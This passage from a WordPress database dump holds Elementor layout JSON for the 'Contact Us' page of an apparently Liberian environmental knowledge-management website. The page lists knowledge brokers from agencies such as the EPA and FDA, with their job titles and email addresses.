direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14918,2369,'_elementor_edit_mode','builder'),(14919,2369,'_elementor_template_type','wp-page'),(14920,2369,'_elementor_version','2.7.5'),(14921,2369,'_wp_page_template','default'),(14922,2369,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or Fill out the form below:\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer, EPA<br>\\n\\nUNCBD Focal Point<br>\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong><br>\\n\\nMEAs Coordinator, EPA<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\nGIS Coordinator, EPA<br>\\nUNCCD Focal Point<br>\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement, EPA<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA, EPA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a 